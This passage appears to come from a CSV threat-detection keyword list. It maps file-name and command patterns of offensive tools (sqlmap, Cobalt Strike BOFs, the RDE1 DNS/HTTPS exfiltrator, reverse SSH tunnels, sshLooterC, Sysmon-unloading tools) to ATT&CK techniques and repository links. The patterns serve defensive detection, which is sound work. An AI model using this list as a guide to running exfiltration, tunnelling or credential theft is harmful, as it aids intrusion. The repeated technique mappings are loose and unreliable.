tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*sqlmapapi -*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*sqlmapapi.py,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1059 - T1553 - T1574 - T1210 - T1220,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*sqlmapapi.py*,offensive_tool_keyword,sqlipy,SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.,T1190 - T1210 - T1574,TA0002 - TA0040 - TA0043,N/A,N/A,Network Exploitation tools,https://github.com/codewatchorg/sqlipy,1,1,N/A,N/A,3,247,102,2023-05-08T18:50:41Z,2014-09-22T03:25:42Z -*sqlmapproject/sqlmap*,offensive_tool_keyword,sqlmap,Automatic SQL injection and 
database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*SQLmate*,offensive_tool_keyword,SQLmate,A friend of SQLmap which will do what you always expected from SQLmap.,T1210 - T1211 - T1021 - T1059,TA0002 - TA0011 - TA0003,N/A,N/A,Web Attacks,https://github.com/s0md3v/sqlmate,1,1,N/A,N/A,4,392,119,2019-05-05T15:53:06Z,2017-10-19T19:55:58Z -*sqlninja*,offensive_tool_keyword,sqlninja,...a SQL Server injection & takeover tool,T1505 - T1526 - T1583 - T1588 - T1590,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Web Attacks,http://sqlninja.sourceforge.net/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*SQLRecon.exe*,offensive_tool_keyword,SQLRecon,A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation,T1003.003 - T1049 - T1059.005 - T1078.003,TA0005 - TA0006 - TA0002 - TA0004,N/A,N/A,Network Exploitation Tools,https://github.com/skahwah/SQLRecon,1,1,N/A,N/A,6,502,97,2023-08-10T00:42:31Z,2021-11-19T15:58:49Z -*SQLRecon.git*,offensive_tool_keyword,SQLRecon,A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation,T1003.003 - T1049 - T1059.005 - T1078.003,TA0005 - TA0006 - TA0002 - TA0004,N/A,N/A,Network Exploitation Tools,https://github.com/skahwah/SQLRecon,1,1,N/A,N/A,6,502,97,2023-08-10T00:42:31Z,2021-11-19T15:58:49Z -*SQLServer_Accessible_PotentialSensitiveData.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*SQLServer_DefaultLogin.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - 
TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*src/cracker.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*src/genmkvpwd.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*src/john.asm*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*src/ligolo*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*src/obfuscator.c*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*src/Remote/chromeKey/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*src/Remote/lastpass/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*src/Remote/sc_config/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*src/Remote/sc_create/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*src/Remote/sc_delete/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*src/Remote/sc_start/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*src/ShellGhost.c*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*Src/Spray-AD*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*src/tests/NESSIE/*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*src/xmrig.cpp*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*src/zerologon.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF zerologon exploit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/rsmudge/ZeroLogon-BOF,1,1,N/A,10,10,148,40,2022-04-25T11:22:45Z,2020-09-17T02:07:13Z -*src\unhook.c*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,0,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*src\unhook.c*,offensive_tool_keyword,cobaltstrike,Remove API hooks from a Beacon process.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus 
- FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/unhook-bof,1,0,N/A,10,10,240,61,2021-09-18T18:12:41Z,2021-01-13T02:20:44Z -*src\xmrig.cpp*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*srde dns -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*srde https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*srde_release dns -k *,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*srde_release https -i *,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z 
-*srvsvc_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*ss -tunlp || netstat -tunlp*127.0.0.1*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*ssf.exe -D * -p * 127.0.0.1*,offensive_tool_keyword,ssfd,sets up a communication channel possibly for command and control (C2) or exfiltration purposes,T1218.011,TA0005,N/A,N/A,C2,https://github.com/securesocketfunneling/ssf,1,0,N/A,10,10,1502,240,2021-05-24T17:29:16Z,2015-06-01T17:34:23Z -*ssfd.exe -p *,offensive_tool_keyword,ssfd,sets up a communication 
channel possibly for command and control (C2) or exfiltration purposes,T1218.011,TA0005,N/A,N/A,C2,https://github.com/securesocketfunneling/ssf,1,0,N/A,10,10,1502,240,2021-05-24T17:29:16Z,2015-06-01T17:34:23Z -*ssh @ssh.*.devtunnels.ms*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*ssh -N -R 4567:localhost:*root*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,0,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*ssh2john *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ssh2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*sshame*,offensive_tool_keyword,sshame,tool to brute force SSH public-key authentication,T1110 - T1114 - T1112 - T1056,TA0001 - TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/HynekPetrak/sshame,1,0,N/A,N/A,1,65,15,2023-04-17T12:44:57Z,2019-08-25T16:50:56Z -*ssh-auditor*,offensive_tool_keyword,ssh-auditor,The best way to scan for weak ssh passwords on your network.,T1110 - T1114 - T1112 - T1056,TA0001 - TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/ncsa/ssh-auditor,1,0,N/A,N/A,6,582,88,2023-02-25T01:34:02Z,2016-11-08T22:47:38Z 
-*sshbrute.py*,offensive_tool_keyword,burpsuite,Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/signorrayan/RedTeam_toolkit,1,1,N/A,N/A,5,499,114,2023-09-27T04:40:54Z,2021-08-18T08:58:14Z -*SSHBruteForce.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*sshkey_persistence.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*sshLooterC*,offensive_tool_keyword,sshLooterC,script to steel password from ssh - Its the C version of sshLooter. which was written in python and have a lot of dependencies to be installed on the infected machine. Now with this C version. you compile it on your machine and send it to the infected machine without installing any dependencies.,T1003 - T1059 - T1083 - T1566 - T1558.003,TA0002 - TA0008 - TA0005,N/A,N/A,Credential Access,https://github.com/mthbernardes/sshLooterC,1,1,N/A,N/A,3,246,72,2023-06-08T21:12:10Z,2018-12-19T20:25:11Z -*ssh-mitm*,offensive_tool_keyword,ssh-mitm,An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.,T1040 - T1071 - T1552,TA0006 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/jtesta/ssh-mitm,1,1,N/A,N/A,10,1548,211,2021-07-02T02:17:26Z,2017-05-16T19:55:10Z -*sshmon*hunt*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*sshmon*kill*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*ssh-putty-brute -*,offensive_tool_keyword,SSH-PuTTY-login-bruteforcer,Turn PuTTY into an SSH login bruteforcing tool.,T1110.002 - 